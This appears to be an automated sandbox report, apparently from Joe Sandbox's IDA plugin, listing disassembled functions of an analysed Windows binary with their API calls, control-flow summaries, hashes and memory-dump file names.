                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 237503144-0
                                                                                                                                                                                                                                                        • Opcode ID: f1b0b0c65760f37ef0e18ad2b500efd35d534aa32cdf5666fe95914414987c5c
                                                                                                                                                                                                                                                        • Instruction ID: ba70e1e4ff56faaea87af9baa42d11f4fcaac82a59d7bd4d9c6c10dbcb4506f7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f1b0b0c65760f37ef0e18ad2b500efd35d534aa32cdf5666fe95914414987c5c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E311FE9F002401BE505B6612C63B7F71579BD6718F0C1428F4072B383EE65F91696EB
                                                                                                                                                                                                                                                        Function 009AD7EE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 1053 9ad7ee-9ad7f3 1054 9ad813-9ad819 1053->1054 1055 9ad7f5-9ad7f9 1053->1055 1057 9ad896-9adbfb FreeLibrary call 9bfe00 1054->1057 1056 9ad800-9ad809 1055->1056 1056->1056 1058 9ad80b-9ad80e 1056->1058 1062 9adc00-9adc12 1057->1062 1058->1057 1062->1062 1063 9adc14-9adc19 1062->1063 1064 9adc1b-9adc1f 1063->1064 1065 9adc2d 1063->1065 1067 9adc20-9adc29 1064->1067 1066 9adc30-9adc72 GetComputerNameExA 1065->1066 1067->1067 1068 9adc2b 1067->1068 1068->1066
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 009AD898
                                                                                                                                                                                                                                                        • GetComputerNameExA.KERNELBASE(00000006,?,?), ref: 009ADC43
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ComputerFreeLibraryName
                                                                                                                                                                                                                                                        • String ID: ;87>
                                                                                                                                                                                                                                                        • API String ID: 2904949787-2104535307
                                                                                                                                                                                                                                                        • Opcode ID: 40e73aa5b8c89ebf326e1ba90e90d1e4b74438a7c85017c13ef8be9d18600227
                                                                                                                                                                                                                                                        • Instruction ID: ff6988f9585629758d84509cf3b2c515f129ebe528d57f49cc858573f991b5ab
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 40e73aa5b8c89ebf326e1ba90e90d1e4b74438a7c85017c13ef8be9d18600227
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B22128715057428FDB218F38C850B26BFF1AF57310F188A98D4D78B792D6389842D791
                                                                                                                                                                                                                                                        Function 00989D1E Relevance: 3.1, APIs: 2, Instructions: 142libraryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000), ref: 00989D98
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000), ref: 00989E78
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                                                                                                                        • Opcode ID: abd6fce284455aef34ce3c019c6a47d2027d1d18a67cd1c0c743e81ca61c3632
                                                                                                                                                                                                                                                        • Instruction ID: dcc831636101aa89c5fc7accc4452a01f7221a8ae200c80f42de2af2b1289573
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: abd6fce284455aef34ce3c019c6a47d2027d1d18a67cd1c0c743e81ca61c3632
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DD411274D003409FE715AF7899D2A9A7FB1EB06324F51429CE4A02F3A6C631940ACBE2
                                                                                                                                                                                                                                                        Function 0098EF53 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoInitializeEx.COMBASE(00000000,00000002), ref: 0098F09D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Initialize
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2538663250-0
                                                                                                                                                                                                                                                        • Opcode ID: d05811b688ceede7bb0a233eb49056de2b412852bd466892a570356ad570547b
                                                                                                                                                                                                                                                        • Instruction ID: 746aa37683ed9c4b6e2cd2b19e5d10eb3471cab4fe5d5c74037a1c4fb5e8cad1
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d05811b688ceede7bb0a233eb49056de2b412852bd466892a570356ad570547b
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EA41C6B4910B40AFD370EF39994B713BEB8AB05250F504B1EF9E6866D4E331A4198BD7
                                                                                                                                                                                                                                                        Function 009AD7BD Relevance: 1.6, APIs: 1, Instructions: 88COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetComputerNameExA.KERNELBASE(00000005,?,?), ref: 009ADD03
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ComputerName
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3545744682-0
                                                                                                                                                                                                                                                        • Opcode ID: f61f84a49dab927accbbcf8ff5c76477b26ab7478b4aeccd029c2b7742ef6064
                                                                                                                                                                                                                                                        • Instruction ID: bc828dc2453154bc3e211fdee9f32e68033758c932d4316204f2c088d31531fe
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f61f84a49dab927accbbcf8ff5c76477b26ab7478b4aeccd029c2b7742ef6064
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FD21C4705057918FD72A8F24C460732BBE2BF5B304F5885CDD4D38B692CA78A841D7A1
                                                                                                                                                                                                                                                        Function 009BE0A0 Relevance: 1.5, APIs: 1, Instructions: 31memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlReAllocateHeap.NTDLL(?,00000000), ref: 009BE0E0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                        • Opcode ID: b57277d2b71d445d6cecea125600d38b587ca123381633e9eb45ecbc7799272c
                                                                                                                                                                                                                                                        • Instruction ID: 5756e368385be4e8249cefcb77d38ceda50867d816b17a9f7260e24d80e1663b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b57277d2b71d445d6cecea125600d38b587ca123381633e9eb45ecbc7799272c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63F0307292C211FBD2102F28BE09B973AB8AFD6730F150875F4045B165DA75E81695A1
                                                                                                                                                                                                                                                        Function 0098EC77 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0098ECA3
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: InitializeSecurity
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 640775948-0
                                                                                                                                                                                                                                                        • Opcode ID: b145d59474f6909d1024996d774dc4796303d36060fe4a5d8c3b30a7663d20a4
                                                                                                                                                                                                                                                        • Instruction ID: e99bd2812a2618a513907549869e70a9e73a12ce6b2dd793c48a4fc3aecfd6a6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b145d59474f6909d1024996d774dc4796303d36060fe4a5d8c3b30a7663d20a4
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BE092347EA7827AF6398614DC63F2621165B86F29E306B05B7253E3D4CFD47541414D
                                                                                                                                                                                                                                                        Function 009B0B2B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                        • Opcode ID: 9d8a74f35e0f98ee20537a5bd72ace8ddd30d89838df30373d89adb4bbbe94be
                                                                                                                                                                                                                                                        • Instruction ID: 503d70c42f479e66a3c8feebc1269fb66638edce03a2aae196d2a9e5ffb4b1a8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d8a74f35e0f98ee20537a5bd72ace8ddd30d89838df30373d89adb4bbbe94be
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BFF0DAB4509701CFE345DF28D1A4B1ABBF4FB88704F10884CE4968B3A0CB75AA48CF82
                                                                                                                                                                                                                                                        Function 009B28EB Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: BlanketProxy
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3890896728-0
                                                                                                                                                                                                                                                        • Opcode ID: 925d61e2580eecb29152feac56621bd1a17e75f930443d3d84412a7519f7941a
                                                                                                                                                                                                                                                        • Instruction ID: c83bc901d7ef51e4cd1be820d5312a3eb05ea9956ef613af847ed008a0e9e320
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 925d61e2580eecb29152feac56621bd1a17e75f930443d3d84412a7519f7941a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EBF07A7451C3418FD314DF24D5A8B1BBBE0BB84308F01891DE5998B390C7B59649CF82
                                                                                                                                                                                                                                                        Function 00989EB7 Relevance: 1.5, APIs: 1, Instructions: 18networkCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 00989ED2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1613840544.0000000000981000.00000040.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613821678.0000000000980000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613840544.00000000009C5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613898378.00000000009D3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.00000000009D5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000B5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C67000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C6E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1613924965.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614208855.0000000000C7E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614324867.0000000000E1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.1614343964.0000000000E1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_980000_4KDKJjRzm8.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Startup
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 724789610-0
                                                                                                                                                                                                                                                        • Opcode ID: 8b9913e1d7553690fd2bb07310dd32d4acf401ab573e812ab719cb4268f3749f
                                                                                                                                                                                                                                                        • Instruction ID: da7cd1799cb9650541055b78b128de0b714da8e0ce77e39fc1ab373414e64316
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8b9913e1d7553690fd2bb07310dd32d4acf401ab573e812ab719cb4268f3749f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 81E02B33A54602DBD700DB34EC57E993356DB553867068428E115C1072EA72F410EA10
                                                                                                                                                                                                                                                        Function 009BC570 Relevance: 1.5, APIs: 1, Instructions: 15memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlFreeHeap.NTDLL(?,00000000,?,009BE0F9), ref: 009BC590
